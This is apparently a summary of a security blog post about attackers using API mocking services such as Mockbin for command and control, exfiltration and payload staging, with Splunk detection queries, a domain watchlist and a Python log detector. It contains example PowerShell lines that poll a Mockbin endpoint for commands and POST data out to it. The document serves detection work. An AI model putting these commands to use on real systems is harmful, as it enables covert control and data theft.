
Mockbin and the Art of Deception: Tracing Adversaries Going Headless

How attackers abuse API mocking services like Mockbin for C2, data exfiltration, and payload staging - and how to detect it.

mockbin c2 exfiltration api-abuse detection splunk

Originally published on the Splunk Security Blog
Read the full article: Mockbin and the Art of Deception

The Legitimate Service Problem

Mockbin, Pipedream, and similar API mocking services are legitimate developer tools. But their features make them perfect for attackers:

  • Free - No payment trail
  • Anonymous - Minimal registration
  • Flexible - Return any content type
  • Trusted - Often not blocked by proxies

Attack Use Cases

Command & Control

# Attacker creates Mockbin endpoint returning commands
https://mockbin.org/bin/[id]

# Malware polls endpoint for instructions
Invoke-WebRequest https://mockbin.org/bin/[id]

Data Exfiltration

# Exfil via POST to Mockbin
Invoke-WebRequest -Uri "https://mockbin.org/bin/[id]" -Method POST -Body $data

Payload Staging

Attackers can host an encoded payload on a mocking endpoint and have a small loader download, decode, and execute it, so the malicious content never has to live on infrastructure they own.

Detection Strategies

Network Indicators

index=proxy dest_host IN ("mockbin.org", "*.pipedream.net", "*.requestbin.com")
| stats count by src_ip, dest_host, uri_path, http_method
| sort -count

Suspicious PowerShell

index=sysmon EventCode=1 Image="*powershell*"
  (CommandLine="*mockbin*" OR CommandLine="*pipedream*")
| table _time, Computer, User, CommandLine

DNS Queries

index=dns query IN ("mockbin.org", "*.pipedream.net")
| stats count by src_ip, query
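The network-indicator logic above, as an added example that is not part of the original post or the Splunk article: a small Python detector that applies the same watchlist (with "*." subdomain wildcards) to constructed proxy log lines, reproduces the `stats count by src_ip, dest_host, uri_path, http_method` roll-up, and flags large outbound POSTs as possible exfiltration. The log format, the 4096-byte threshold, and all sample values are assumptions made for the example.

```python
import re
from collections import Counter
from fnmatch import fnmatch

# Watchlist mirrors the SPL queries; "*." patterns match any subdomain (assumption).
MOCKING_SERVICE_PATTERNS = ("mockbin.org", "*.pipedream.net", "*.requestbin.com")

# Constructed sample proxy log lines (not real telemetry). Format, one event per line:
#   src_ip method dest_host uri_path status bytes_out
SAMPLE_PROXY_LOG = """\
10.0.0.5 GET mockbin.org /bin/abc123 200 120
10.0.0.5 GET mockbin.org /bin/abc123 200 120
10.0.0.7 POST evil.m.pipedream.net /hook 200 48211
10.0.0.9 GET www.example.com / 200 900
10.0.0.5 POST mockbin.org /bin/abc123 200 7000
"""

LOG_RE = re.compile(
    r"^(?P<src_ip>\S+) (?P<method>[A-Z]+) (?P<host>\S+) (?P<path>\S+) "
    r"(?P<status>\d{3}) (?P<bytes_out>\d+)$"
)


def is_mocking_service(host):
    """True if host matches the watchlist; hosts are lower-cased so matching is case-insensitive."""
    host = host.lower().rstrip(".")
    return any(fnmatch(host, pattern) for pattern in MOCKING_SERVICE_PATTERNS)


def parse_proxy_log(text):
    """Parse the constructed log format into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            event = m.groupdict()
            event["bytes_out"] = int(event["bytes_out"])
            events.append(event)
    return events


def summarize_mocking_traffic(events):
    """Equivalent of `stats count by src_ip, dest_host, uri_path, http_method | sort -count`."""
    counts = Counter((e["src_ip"], e["host"], e["path"], e["method"])
                     for e in events if is_mocking_service(e["host"]))
    return counts.most_common()


def flag_possible_exfil(events, min_bytes=4096):
    """Outbound POSTs to a mocking service with a large request body (threshold is an assumption)."""
    return [e for e in events
            if e["method"] == "POST" and is_mocking_service(e["host"]) and e["bytes_out"] >= min_bytes]
```

Polling behaviour shows up as repeated identical (src_ip, host, path, GET) tuples at the top of the summary, while the exfiltration filter isolates the POSTs worth pulling full request bodies for.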

Defense Recommendations

  • Block or alert on known API mocking services
  • Monitor for unusual outbound POST requests
  • Inspect traffic to free hosting services
  • Consider SSL inspection for high-risk domains

Read the full breakdown: Mockbin and the Art of Deception
